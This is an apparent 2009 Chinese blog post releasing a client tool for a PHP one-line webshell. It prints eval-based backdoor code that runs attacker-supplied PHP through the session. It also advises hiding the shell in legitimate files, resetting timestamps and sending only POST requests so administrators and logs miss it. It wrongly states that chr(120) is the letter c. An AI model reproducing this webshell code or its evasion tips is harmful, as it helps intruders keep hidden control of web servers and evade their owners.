V0.2

2009-11-11(正好是光棍节，晕~)更新内容:

—————————–

1.修补了下原始版本有些服务器不能正常运行的大Bug。

2.去掉了提交后的登陆密码验证，提交后直接进入大马界面。

—————————–

更新说明:

—————————–

这玩意本来就是为了方便自己做的，所以本来只打算对自己负责，呵呵。好马好工具如果传出来必然被传烂掉，但这东西无所谓，又不是多特别的东西，但有时候用着比较方便，所以发出来也无妨。

但是发出来后有朋友告诉我有些服务器上运行没成功，心里顿觉愧疚，发个小东西出来，结果功能还有问题，岂不是欺骗大众。但是一直在忙，除了当时做的 时候之外，几乎再没去测试过。昨晚hiphop兄给我说他那有台服务器用不起，本来打算让他发Shell来我正好测试下具体原因，结果他说他已经测试了并 告诉是magic_quotes_gpc的原因(是个低级错误…)，得谢谢他。

然后花了个把小时详细测试并修改了下

相关关键代码:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);

—————————–

现在的版本magic_quotes_gpc On和Off都测试OK，不过不知道还有没有其它会造成不正常的因素，实在懒的自己去一个一个测试了，等遇到了再说吧，也欢迎大家反馈。

—————————–

——————–

前天通宵到后半夜的时候，总觉得自己最近都没干什么实事，觉得有点虚度的味道，心中不免有些自责。为了宽慰自己，决定做点正事。然后就啥都没干，坐着干想该做什么。一直想到快天亮，总算想出点东西来了(- -!)，也就是现在发布的这个东西。

海洋顶端有个一键提交版的ASP一句话客户端，很方便，一次提交之后，一句话就可以当大马用了。用这种客户端的话，留一句话的shell也就麻烦不到哪去了，而且把一句话藏在正常文件里面，再把时间改回正常，访问只用POST的话，基本是很难发现的。

但是PHP一句话一直没有见这样的客户端(不知道是不是我孤弱寡闻)，网上居然还有转载的到处都是的工具，结果下载下来不能用…..

比较喜欢一句话的一键提交这种形式，所以花了2 x 半个通宵的时间做了这个东西，思路参考的是海洋，客户端的CSS也是修改它的，呵呵。

注意:

由于一键提交版的特殊性，暂时是不能随心所欲的换密码的，这个客户端的密码是字母c。(海洋的也是这样)。这个问题并不是不能解决，但是比较麻烦，所以还不如就用这密码呢，呵呵。

特点:

1.填好一句话WebShell地址和密码并点提交之后，后续操作不用再依赖客户端，基本上剩下的和操作大马没什么两样。

2.完全POST提交，避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话，插完时间也改回来了，那么管理员发现的概率就相当低了。(海洋的不是全POST)

大概原理:

一键提交版的一句话客户端连接成功之后，每次POST数据的时候, 假设一句话密码是c，都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);

chr(120)就是字母c，为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候，才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。